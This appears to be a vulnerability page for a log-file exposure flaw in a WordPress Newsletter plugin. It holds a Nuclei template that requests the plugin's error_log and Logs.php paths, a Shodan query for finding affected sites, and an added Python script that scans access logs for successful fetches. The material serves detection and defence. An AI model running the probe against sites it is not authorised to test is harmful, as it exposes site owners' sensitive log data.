Vulnerability Description
The Newsletters plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.9.5. This makes it possible for unauthenticated attackers to extract potentially sensitive information from log files.
id: wp-newsletter-log-exposure

info:
  name: WordPress Newsletter - Log File Exposure
  author: pussycat0x
  severity: medium
  description: |
    The Newsletters plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.9.5. This makes it possible for unauthenticated attackers to extract potentially sensitive information from log files.
  reference:
    - https://wpscan.com/vulnerability/334e02e9-fcbd-47fe-b7ab-079dd525b396/
  metadata:
    shodan-query: http.html:"/wp-content/plugins/newsletter/"
  tags: wordpress,wp-plugin,newsletter,logs

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/newsletter/error_log"
      - "{{BaseURL}}/wp-content/plugins/newsletter/classes/Newsletter/Logs.php"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("\\[\\d{2}-[A-Za-z]{3}-\\d{4} \\d{2}:\\d{2}:\\d{2}", body)'
          - 'contains_any(body, "PHP Fatal error:", "PHP Warning:", "PHP Notice:", "PHP Parse error:")'
        condition: and
# digest: 490a0046304402201635d07803d2698f11862ca087686645699547de841e6d573e6255195ffe969c02204d091dd88f233eca8658be09a9e5025df1705c722afdc6db46127de2723eb13c:922c64590222798bb761d5b6d8e72950
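
For defenders triaging this issue, the following added example (not part of the original page or the template author's work) scans a web server access log for requests to the two paths the template probes that were answered with HTTP 200. It assumes the Apache/nginx "combined" log format; the function name and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Paths probed by the template above (relative to the site root).
EXPOSED_PATHS = (
    "/wp-content/plugins/newsletter/error_log",
    "/wp-content/plugins/newsletter/classes/Newsletter/Logs.php",
)

# Apache/nginx "combined" access-log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_log_fetches(lines):
    """Return {client_ip: [(timestamp, path, bytes), ...]} for 200 responses
    to the exposed paths. Other statuses (403, 404) mean the request was
    refused or the file was absent, so they are skipped."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "200":
            continue
        path = m["target"].split("?", 1)[0]  # ignore any query string
        if path in EXPOSED_PATHS:
            size = 0 if m["size"] == "-" else int(m["size"])
            hits[m["ip"]].append((m["ts"], path, size))
    return dict(hits)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2025:10:01:02 +0000] "GET /wp-content/plugins/newsletter/error_log HTTP/1.1" 200 48213 "-" "curl/8.5.0"',
    '192.0.2.10 - - [12/Mar/2025:10:01:03 +0000] "GET /wp-content/plugins/newsletter/classes/Newsletter/Logs.php HTTP/1.1" 404 153 "-" "curl/8.5.0"',
    '198.51.100.7 - - [12/Mar/2025:10:05:00 +0000] "GET /wp-content/plugins/newsletter/error_log?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2025:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_log_fetches(SAMPLE).items():
        for ts, path, size in events:
            print(f"{ip} fetched {path} ({size} bytes) at {ts}")
```

A 200 in the access log shows that content was served, not that the body met the template's other conditions (the timestamp pattern plus a PHP error marker), so confirm each hit against the file on disk.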